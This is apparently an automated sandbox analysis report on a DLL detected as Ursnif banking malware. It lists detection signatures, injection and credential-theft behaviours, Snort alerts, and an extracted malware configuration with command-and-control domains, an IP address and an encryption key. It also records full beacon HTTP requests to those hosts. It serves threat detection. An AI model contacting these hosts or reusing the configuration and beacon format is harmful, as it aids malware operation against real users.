Windows Analysis Report data.dll

Overview

General Information

Sample Name: data.dll
Analysis ID: 498359
MD5: b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1: 4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256: 7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags: dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/lbK Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/ Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/l Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: data.dll Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for domain / URL
Source: art.microsoftsofymicrosoftsoft.at Virustotal: Detection: 10% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00DD3FAB

Compliance:

barindex
Uses 32bit PE files
Source: data.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: data.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0457A5F6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0457CC4A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0457198F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04580BC5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_04BBCC4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_04BB198F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_04BC0BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 49_2_0097198F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 49_2_00980BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 49_2_0097CC4A

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49779 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49779 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49780 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49780 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49781 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49781 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49862 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49862 -> 194.147.86.221:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80 Jump to behavior
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETRACK-ASRU NETRACK-ASRU
Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/
Source: rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm
Source: rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/l
Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/lbK
Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp String found in binary or memory: http://twitter.com/spotify:
Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~
